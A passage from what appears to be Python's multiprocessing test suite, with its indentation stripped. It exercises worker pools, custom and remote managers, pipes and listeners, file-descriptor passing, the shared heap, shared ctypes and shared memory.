origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
